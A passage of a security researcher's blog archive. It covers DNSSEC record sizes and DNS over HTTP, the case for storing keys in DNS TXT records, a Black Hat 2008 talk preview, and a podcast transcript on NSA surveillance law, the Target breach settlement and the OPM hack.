VR0fBIIBATCB/jCB+6CB+KCB9YZYaHR0cDovL21zY3JsLm1pY3Jvc29mdC5jb20v
cGtpL21zY29ycC9jcmwvTWljcm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0
aG9yaXR5KDgpLmNybIZWaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9tc2Nv
cnAvY3JsL01pY3Jvc29mdCUyMFNlY3VyZSUyMFNlcnZlciUyMEF1dGhvcml0eSg4
KS5jcmyGQWh0dHA6Ly9jb3JwcGtpL2NybC9NaWNyb3NvZnQlMjBTZWN1cmUlMjBT
ZXJ2ZXIlMjBBdXRob3JpdHkoOCkuY3JsMIG/BggrBgEFBQcBAQSBsjCBrzBeBggr
BgEFBQcwAoZSaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9tc2NvcnAvTWlj
cm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0aG9yaXR5KDgpLmNydDBNBggr
BgEFBQcwAoZBaHR0cDovL2NvcnBwa2kvYWlhL01pY3Jvc29mdCUyMFNlY3VyZSUy
MFNlcnZlciUyMEF1dGhvcml0eSg4KS5jcnQwPwYJKwYBBAGCNxUHBDIwMAYoKwYB
BAGCNxUIg8+JTa3yAoWhnwyC+sp9geH7dIFPg8LthQiOqdKFYwIBZAIBCjAnBgkr
BgEEAYI3FQoEGjAYMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMIGuBgNVHREEgaYw
gaOCDyoubWFpbC5saXZlLmNvbYINKi5ob3RtYWlsLmNvbYILaG90bWFpbC5jb22C
D2hvdG1haWwubXNuLmNvbYINaG90bWFpbC5jby5qcIINaG90bWFpbC5jby51a4IQ
aG90bWFpbC5saXZlLmNvbYITd3d3LmhvdG1haWwubXNuLmNvbYINbWFpbC5saXZl
LmNvbYIPcGVvcGxlLmxpdmUuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQC9trl32j6J
ML00eewSJJ+Jtcg7oObEKiSWvKnwVSmBLCg0bMoSCTv5foF7Rz3WTYeSKR4G72c/
pJ9Tq28IgBLJwCGqUKB8RpzwlFOB8ybNuwtv3jn0YYMq8G+a6hkop1Lg45d0Mwg0
TnNICdNMaHx68Z5TK8i9QV6nkmEIIYQ32HlwVX4eSmEdxLX0LTFTaiyLO6kHEzJg
CxW8RKsTBFRVDkZQ4CtxpvSV3OSJEEoHiJ++RiLZYY/1XRafwxqESMn+bGNM7aoE
NHJz3Uzu2/rSFQ5v7pmTpJokNcHl8hY1fCFs01PYkoWm0WXKYnDHL4+L46orvsyE
GM1PAYpIdTSp
—–END CERTIFICATE—–

Compared to the size of an IP address, this is a bit much.  There are three things that give me pause about pushing so

much in.

First — and, yes, this is a personal bias — every time we *try* to put this much in DNS, we end up creating a new

protocol in which we don’t.  There’s a dedicated RRTYPE for certificate storage, called CERT.  From what I can tell,

the PGP community used CERT, and then migrated away.  There’s also the experience we can see in the X.509 realm, where

they had many places where certificate chains were declared inline.  For various reasons, these in-protocol

declarations were farmed out into URLs in which resources could be retrieved as necessary.  Inlining became a

scalability blocker.

Operational experience is important.

Second, there’s a desire to avoid DNS packets that are too big to fit into UDP frames.  UDP, for User Datagram

Protocol, is basically a thin application based wrapper around IP itself.  There’s no reliability and few features

around it — it’s little more than “here’s the app I want to talk to, and here’s a checksum for what I was trying to

say” (and the latter is optional).  When using UDP, there are two size points to be concerned with.

The first is (roughly) 512 bytes.  This is the traditional maximum size of a DNS packet, because it’s the traditional

minimum size of a packet an IP network can be guaranteed to transmit without fragmentation en route.

The second is (roughly) 1500 bytes.  This is essentially how much you’re able to move over IP (and thus UDP) itself

before your packet gets fragmented — generally immediately, because it can’t even get past the local Ethernet card.

There’s a strong desire to avoid IP fragmentation, as it has a host of deleterious effects.  If any IP fragment is

dropped, the entire packet is lost.  So there’s “more swings at the bat” at having a fatal drop.  In the modern world

of firewalls, fragmentation isn’t supported well as you can’t know whether to pass a packet until the entire thing has

been reassembled.  I don’t think any sites flat out block fragmented traffic, but it’s certainly not something that’s

optimized for.

Finally — and more importantly than anyone admits — fragmented traffic is something of a headache to debug.  You

have to have reassembly in your decoders, and that can be slow.

However, we’ve already sort of crossed the rubicon here.  DNSSEC is many things, but small is not one of them.  The

increased size of DNSSEC responses is not by any stretch of the imagination fatal, but it does end the era of tiny

traffic.  This is made doubly true by the reality that, within the next five or so years, we really will need to

migrate to keysizes greater than 1024.  I’m not sure we can afford 2048, though NIST is fairly adamant about that.

But 1024 is definitely the new 512.

That’s not to say that DNSSEC traffic will always fragment at UDP.  It doesn’t.  But we’ve accepted that DNS packets

will get bigger with DNSSEC, and fairly extensive testing has shown that the world does not come to an end.

It is a reasonable thing to point out though , that while use of DNSSEC might lead to fragmentation, use of massive

records in the multi-kilobyte range *will*, every time.

(There’s an amusing thing in DNSSEC which I’ll go so far as to say I’m not happy about.  There’s actually a bit,

called DO, that says whether the client wants signatures.  *Theoretically* we could use this bit to only send DNSSEC

responses to clients that are actually desiring signatures.  But I think somebody got worried that architectures would

be built to only serve DNSSEC to 0.01% of clients — gotta start somewhere.  So now, 80% of DNS requests claim that

they’ll validate DNSSEC.  This is…annoying.)

Now, there’s of course a better way to handle large DNS records than IP fragmenting:  TCP.  But TCP has historically

been quite slow, both in terms of round trip time (there’s a setup penalty) and in terms of kernel resources (you have

to keep sockets open).  But a funny thing happened on the way to billions of hits a day.

TCP stopped being so bad.

The setup penalty, it turns out, can be amortized across multiple queries.  Did you know that you can run many queries

off the same TCP DNS socket, pretty much exactly like HTTP pipelines?  It’s true!  And as for kernel resources…

TCP stacks are now fast.  In fact — and, I swear, nobody was more surprised than me — when I built support for what

I called “HTTP Virtual Channel” into Phreebird and LDNS, so that all DNS queries would be tunneled over HTTP, the

performance impact wasn’t at all what I thought it would be:

DNS over HTTP is actually *faster* than DNS over UDP — by a factor of about 25%.  Apparently, a decade of optimising

web servers has had quite the effect.  Of course, this requires a modern approach to TCP serving, but that’s the sort

of thing libevent makes pretty straightforward to access.  And it’s not like DNSSEC isn’t necessitating pretty deep

upgrades to our name server infrastructure anyway.

So it’s hard to argue we shouldn’t have large DNS records, just because it’ll make the DNS packets better.  That ship

has sailed.  There is of course the firewalling argument — you can’t depend on TCP, because clients may not support

the transport.  I have to say, if your client doesn’t support TCP lookup, it’s just not going to be DNSSEC compliant.

Just part of compliance testing.  Every DNSSEC validator should in fact be making sure TCP is an available endpoint.

There’s a third argument, and I think it deserves to be aired.  Something like 99.9% of users are behind a DNS cache

that groups their queries with other users.  On average, something like 90% of all queries never actually leave their

host networks; instead they are serviced by data already in the cache.

Would it be fair for one domain to be monopolizing that cache?

This isn’t a theoretical argument.  More than a few major Top 25 sites have wildcard generated names, *and use them*.

So, when you look in the DNS cache, you indeed see huge amounts of throwaway domains.  Usually these domains have a

low TTL (Time to Live), meaning they expire from cache quickly anyway.  But there are grumbles.

My sense is that if cache monopolization became a really nasty problem, then it would represent an attack against a

name server.  In other words, if we want to say that it’s a bug for http://www.foo.com to populate the DNS cache to the

exclusion of all others, then it’s an attack for http://www.badguy.com to be able to populate said cache to the same

exclusion.  It hasn’t been a problem, or an attack I think, because it’s probably the least effective denial of

service imaginable.

I could see future name servers tracking the popularity of cache entries before determining what to drop.  Hasn’t been

needed yet, though.

Where this comes down to is — is it alright for DNS to require more resources?  Like I wrote earlier, we’ve already

decided it’s OK for it to.  And frankly, no matter how much we shove into DNS, we’re never getting into the traffic

levels that any other interesting service online is touching.  Video traffic is…bewilderingly high.

So do we end up with a case for shoving massive records into the DNS, and justifying it because a) DNSSEC does it and

b) They’re not that big, relative to say Internet Video?  I have to admit, if you’re willing to “damn the torpedos” on

IP Fragmentation or upgrading to TCP, the case is there.  And ultimately, the joys of a delegated namespace is that —

it’s your domain, you can put whatever you want in there.

My personal sense is that while IP fragmentation / TCP upgrading / cache consumption isn’t the end of the world, it’s

certainly worth optimizing against.  More importantly, operational experience that says “this plan doesn’t scale”

shows up all over the place — and if there’s one thing we need to do more of, it’s to identify, respect, and learn

from what’s failed before and what we did to fix it.

A lot of protocols end up passing URLs to larger resources, to be retrieved via HTTP, rather than embedding those

resources inline.  In my next post, we’ll talk about what it might look like to push HTTP URLs into DNS responses.

And that, I think, will segue nicely into why I was writing a DNS over HTTP layer in the first place.

Categories: Security

The DNSSEC Diaries, Ch. 2: For Better or Worse, How The TXT Was Won

December 14, 2010 10 comments

So, I think it’s fairly elegant and straightforward to put a key into DNS like so:

http://www.hospital-link.org IN TXT “v=key1 ha=sha1 h=f1d2d2f924e986ac86fdf7b36c94bcdf32beec15”

On connecting to http://www.hospital-link.org over TLS, a certificate will be delivered.  Traditionally, this certificate would be interrogated to make sure it was signed by a trusted certificate authority.  In the new model:

  • If DNSSEC says the above TXT record chains to the (one) DNS root, and
  • The subtype of the TXT record is key1, and
  • The SHA-1 hash of the delivered certificate is precisely f1d2d2f924e986ac86fdf7b36c94bcdf32beec15, and
  • TLS is happy with the public key in the certificate

…then the connection is considered authenticated, whether or not a CA ultimately signed the certificate.  That’s it.  Move on with life.  Cheap.

Can it really be this easy?  I’ll be honest, some people aren’t the biggest fans of this design.  Implementers like it.  Ops guys like it.  I like it.

Some old school DNS people do not like it.  They don’t want to see everything shoved under a single record type (TXT or otherwise), and they don’t like the idea of a seemingly unstructured textual field containing anything important.  Heck, they even wrote an Informational RFC on the subject. The core arguments in this doc:

  • No semantics to prevent collision with other use
  • Space considerations in the DNS message

It’s really not a great RFC, but these aren’t meaningless concerns.  However, the heart of engineering is understanding not just why systems succeed, but why they fail.  Lets talk about why, despite the above, I’m convinced public keys in DNS should be encoded as TXT records.

The primary reason is that the story of TXT is the story of real world systems trying non-TXT, and, well, running away screaming. In the last ten years, four major projects have all gone TXT:

  1. SPF (Sender Policy Framework)
  2. DKIM (DomainKeys)
  3. GPG’s PKA (PGP Key Retrieval)
  4. FreeSWAN’s IPSec (X-IPSec-Server)

They have company.  From a sample of DNS traces, looking at the count of unique types per unique name:

0.40	143453512	A
0.31	110097927	NS
0.13	48033288	CNAME
0.07	23989120	MX
0.04	12841932	RRSIG
0.02	8314220	PTR
0.02	7665020	TXT
0.01	2575267	NSEC
0.00	1557321	NSEC3
0.00	563675	SRV
0.00	276820	AAAA
0.00	53855	NULL
0.00	44411	SPF
0.00	24308	DS
0.00	3190	DNSKEY
0.00	1498	RP
0.00	1216	HINFO
0.00	1118	DLV
0.00	687	DNAME
0.00	557	LOC
0.00	545	514
0.00	491	NAPTR

Excluding DNSSEC, which is its own universe, and AAAA, which is a trivial blob of bits (a 128 bit IPv6 address), TXT is about three orders of magnitude more popular than all RR types invented in the last ten years combined.  Data encoded in TXT is almost as popular as Reverse DNS!

And it’s not like projects didn’t have the opportunity to use custom RRTYPEs.

Consider:  For half of these packages (GPG and FreeSWAN), RFC’s existed to store their data already, but (and this is important) either the developers found the RFCs too difficult to implement, or users found the code too tricky to deploy.  In FreeS/WAN’s case, this was so true that:

As of FreeS/WAN 2.01, OE uses DNS TXT resource records (RRs) only (rather than TXT with KEY). This change causes a “flag day”.

Wow.  That is fairly tremendous.  Flag days — the complete shift of a system from a broken design to a hopefully better one — are rare to the point of being almost unheard of in networking design.  They are enormously painful, and only executed when the developer believes their product is absolutely doomed to failure otherwise.

There’s a lot of talk about how custom RR’s aren’t that bad.  Talk is cheap.  Evidence that a design choice forced a flag day is rare, precious, and foreboding.

The reality — the real precedent, far larger than the world of DNS or even security — is that for operational and developmental reasons, developers have abandoned binary formats. XML, and even its lighter cousin JSON, are not the smallest possible way to encode a message the world has ever known.  It is possible to save more space.

Sorry, X.509.  We’ve abandoned ASN.1, even if bit for bit it’s more space efficient.  We abandoned it for a reason.  The programming community is simply done with the sort of bit-fiddly constructs that were popular in the 90’s, and that most DNS RR’s are constructed from, even if they are easy to parse in C.

Binary parsers (outside of media formats) are dead.  Frankly, as the number one source of exploitable crashes in most software, I’m not going to miss them.  Heck, we’re not even using TCP ports anymore — we have port 80, and we subtype the heck out of it at the URL layer (much as TXT is subtyped with v=key1).

It doesn’t help that, most of the time, DNS knows what fields it’s going to have to store, and identifies them positionally.  Contrast this with the coming reality of storing keys in DNS, where over time, we’re absolutely going to be adding more flags and bits.  That binary format will not be pretty.

Now, I have no interest in putting XML or even JSON into DNS (though the latter wouldn’t be the worst thing ever).  But what we’ve seen is reasonable consensus regarding what should go into TXT records:

  • SPF:  “v=spf1 a -all”
  • DKIM: “v=DKIM1;p=MIGfMA0G … cQ2QIDAQAB”
  • GPG: “v=pka1;fpr=[#1];uri=[#2]”
  • FreeS/WAN: “X-IPsec-Server(10)=192.1.1.5 AQMM…3s1Q==”

Identical?  No.  But straight key value pairs, and only one protocol that doesn’t begin with a magic cookie?  That’s doable.  That’s easy.

That’s cheap to deploy.  And cheap to deploy matters.

Now, here’s an interesting question:

“Why not use a custom RRTYPE, but fill it with key value pairs, or even JSON?  Why overload TXT?”

It’s a reasonable question.  The biggest source of content expansion comes from the fact that now irrelevant records need to be sent, if there are multiple applications sitting on TXT.  Why not have multiple TXTs?

Perhaps, in the future, we could move in this direction.  Nowhere does it say that the same record can’t show up with multiple types.  (SPF tried this, without much success though.)  But, today, a big part of what makes non-TXT expensive to deploy is that name servers traditionally needed to be rebuilt to support a new record type.  After all, the server wasn’t just hosting records, it was compiling them into a binary format.

(Those who are IT administrators, but not DNS administrators, are all facepalming).

Eventually, RFC 3267 was built to get around this, allowing zone files to contain blobs like this:

sshfp  TYPE44  \# 22 01 01 c691e90714a1629d167de8e5ee0021f12a7eaa1e

To be gentle, zone files filled with hex and length fields, requiring record compilers to update, aren’t exactly operation’s idea of a good, debuggable time.  This is expensive.

Of course, a lot of people aren’t directly editing zone files anymore.  They’re operating through web interfaces.  Through these interfaces, either you’re putting in a resource type the server knows of, you’re putting text into a TXT record, or…you’re putting in nothing.

It’s possible to demand that web interfaces around the Internet be updated to support your new record type.  But there is no more expensive ask than that which demands a UI shift.  A hundred backends can be altered for each frontend that needs to be poked at.  The backends support TXT.  They don’t support anything else, and that fact isn’t going to change anytime soon.

And then there are the firewalls — the same firewalls which, like it or not, have made HTTP on 80/tcp the Universal Tunneling Protocol.  Quoting the above RFC 5507 (which observes the following, and then just seems to shrug):

…Firewalls have dropped queries or responses with Resource Record Types that are unknown to the firewall.  This is, for example, one of the reasons the ENUM standard reuses the NAPTR Resource Record, a decision that today might have gone to creating a new Resource Record Type instead.

There’s a reason all those packages abandoned non-TXT.  Whatever downsides there are to using TXT, and I do admit there are some, those who have chosen an architecturally pure custom RRTYPE have failed, while those who’ve “temporarily” went TXT have prospered.

Next up, lets talk about the challenges of putting bootstrap content into the DNS itself.

"v=pka1;fpr=[#1];uri=[#2]"
Categories: Security

Black Hat 2008

August 2, 2008 11 comments

Five more days until three more conferences.

Three?

Yep — SIGGRAPH finally deigned to not conflict with Black Hat this year, which means I get to stage a return trip to LA and see pretty pictures.  I probably won’t end up with a conference pass, but Emerging Technologies is worth the entire trip.  So much awesome stuff to play with!

So, everyone’s making lists of stuff they want to see.  Here’s some stuff I haven’t heard people talking about:

Concurrency Attacks in Web Applications — Scott Stender
Anyone ever notice how none of the scripting languges have decent threading support — not Perl, not Python, not PHP, not anything?  No?  It’s because maintaining concurrent access to shared resources is really, really hard — one of the hardest problems in computer science.  Theoretically, the problem shouldn’t affect the web, because HTTP is “stateless”.

Well, what’s the first thing every Web Application Framework adds?  State.  And is concurrent access required to this state?

Not usually…users just have a single browser window open…so, it works!  Ship it!

Long term, I suspect Scott’s talk here has significant potential to change web application auditing.

Circumventing Automated JavaScript Analysis Tools — Billy Hoffman
Mobile code happened, and its name is Javascript.  I was recently told of a 75K medical management application, written in JS.  I refused to believe it until I realized that it probably was faster, and more stable, and written at less cost even, than the same code would have been in any other language.

C++ objects, scripted with a language that won’t usually crash — the only way to write a GUI.

It’s even a lot more secure than it gets credit for.  Really, which would you rather parse:

1. x86
2. Java Bytecode
3. MSIL
4. JavaScript

Sure, you can import all sorts of crazy things into the sandbox, but the sandbox itself is pretty good.

Just don’t try to build another sandbox, a second sandbox, out of the sand inside.  People want to do this — they want to let this Javascript run, but not that Javascript run, based on prior analysis.  This, of couse, will not work.  We know it will not work.  Turing Completeness and the Halting Problem pretty much delare you hosed.  But people try anyway, and now, oh look, it’s Billy Hoffman, standing by a fire truck, turning a valve…

Visual Forensic Analysis and Reverse Engineering of Binary Data — Greg Conti, Erik Dean.

The problem with visualization is simple:  99% of it is crap.  1% of it is so amazingly good, it makes the other 99% worth digging through.  Greg’s been working on security visualization for years, and I’m interested in seeing what he’s up to here.

New Classes of Security and Privacy Vulnerabilities for Implantable Wireless Medical Devices — Tadayoshi Kohno, Kevin Fu
Remember when every juice was being mixed with Cranberry — CranApple, CranGrape, etc — because, oh man, people just can’t get enough of that Cran tang?  RFID is the Cran of Technology.

Methods for Understanding Targeted Attacks with Office Documents — Bruce Dang

Bruce Dang is a badass.  You people don’t even know

Encoded, Layered, and Trancoded Syntax Attacks: Threading the Needle past Web Application Security Controls — Arian Evans
If you have no idea how redonkulous securely filtering content really needs to be, you need to see this talk.

Passive and Active Leakage of Secret Data from Non Networked Computer — Eric Filiol
Tempest v. Web 2.0 — two technologies enter, one technology leaves — with the data.

Get Rich or Die Trying – “Making Money on The Web, The Black Hat Way” — Jeremiah Grossman, Arian Evans
It’s 2008, and seriously, it’s all about monetization.  Good to see a talk that recognizes that. 

Reverse DNS Tunneling Shellcode — Ty Miller
So, anyone monitoring for DNS exfiltration yet?  Anyone?

REST for the Wicked — Bryan Sullivan
Seriously?  Is it possible to do REST securely?

Leveraging the Edge: Abusing SSL VPNs — Mike Zusman
You’ll see.

That’s enough for now.  I’ll post in a bit on a few more things — there’s some really interesting Defcon-only talks this year, including a brings-tears-to-your-eyes-it-so-old-school stunt by Jonathan Brossard.  And who knows, maybe I’ll even point out the talks I’d go see at SIGGRAPH if I could.

Well, it’s either that or do more work on DNS 🙂

Categories: Security

Talking with Stewart Baker

June 11, 2015 1 comment

So I went ahead and did a podcast with Stewart Baker, former general counsel for the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate, he understood everything I had to say, and he really applied some critical pressure publicly and behind the scenes to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms we had some disagreements regarding backdoors. and if he asked me about them I’d say as such.  He was completely OK with this, and in today’s echo-chamber loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here but as usual I’ve had the event transcribed.  Enjoy!


 

Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy in government and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at WhiteOps, the man who found and fixed a major and very troubling flaw in the DNS system and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department where he oversaw criminal computer crime, prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what does it do. It gets rid of bulk collection across the board really. It says, “No, you will not go get stuff just because you need it, and won’t be able to get it later if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for a pen trap, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[Helping] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia but with Title 3 yeah; you went in and you said, “I want a Title 3 order” and you got it if you met the standard, in the view of judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the house just went through and said, ”Tell us what capabilities could be used to gather international security agencies’ information and we will impose this specific selection term, requirement, on it.” That is really the main change probably for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: going in that, okay, Telecoms already retain all this stuff for 18 months for billing purpose, and they’re required to by FCC regulation, but I think as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under bulk retention program, especially now that people have unlimited calling plans, Telecoms don’t need to retain information about every number call because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever now. I think we’ll be hearing complaints and having some desire by the Administration to impose some sort of data retention requirements on Telecoms, and then they’ll be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside there are widespread rumors that the database never included many smaller carriers, never included mobile data probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half crippled the program and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use call of duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized “Lawfare” by Ben Wittes and Charlie, who probably values his reputation in National Security circles somewhat, writes a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says “Without public notice or debate the Obama Administration has expanded NSAs warrant with surveillance of American’s international internet traffic to search for evidence of malicious computer hacking” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as American’s international internet traffic? I don’t think when somebody’s hacking me or stealing my stuff, that that’s my traffic. That’s his traffic, and to lead off with that framing of the issue it’s clearly baiting somebody for an attempted scandal, but a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – and the FBI has a program that’s remarkably successful in the sense that people are quite surprised when they show up, to go to folks who have been compromised to say, “By the way, you’re poned,” and most of the time when they do that some people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBIs role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job at knocking on doors or either pushing out information generally through alerts about new malware signatures or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought to the extent that this is one of those things under 702, where I think a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that this is sort of stolen internet traffic from Americans is characterized as surveillance of American’s traffic, is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, he deserves it on this one – but he’s actually usually reasonably careful. The MasterCard settlement or the failed MasterCard settlement in the Target case, Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high profile breaches in the last 18 months people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, try to negotiate a settlement on behalf of all of their issuing banks with Target to pay damages for losses suffered as a result of the breach. In April MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover for all losses and things of that nature.

But three of the largest banks, in fact I think the three largest MasterCard issuing banks, Citi Group, Capital One and JP Morgan Chase, all said no, and indicated they would not support the settlement and scuttled it because they thought $19 million was too small to cover the losses. There are trade groups for the banks and credit unions that say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, and so even if you factor out the Home Depot portion of that $19 million, it’s a pretty small number.

So Target has to go back to the drawing board, as does MasterCard to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost them $10 million to settle the consumer class action, but the bigger exposure is here with the financial institution – Michael made reference last week to some press in which some commentator suggested the class actions from data breaches were on the wane – and we both are of the view that that’s just wrong.

There may be some decrease in privacy related class actions related to misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these planners to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks that are insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really divest – it’s going to extraordinarily expense to migrate our payment system to the reality, which is we have online verification. We can use better technologies. They exist. There’s a dozen ways of doing it that don’t lead to a password to your money all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying 350 is the right number but I’ve got to agree, 19 is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: My first background investigation and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators who I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand up guys for me, but there is a lot of stuff in there that could be used for improper purposes and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPN responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your system sucks so bad you ought to turn them off.”

Jason: Well, first of all as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues and is going to steal my credit card information.

I’m pretty sure that the victims include the three of us so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state sponsored actors, but that seems kind of nonsensical to me. And I think that, as you said, as you both said, that the Chinese are building the very database on us that Americans fear that the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like, and who also work for the US government – and they will recruit them on the basis of ethnic and patriotic duty. And so folks who are in that situation could have their relatives visited for a little chat; there’s a lot of stuff that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than stealing our credit.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

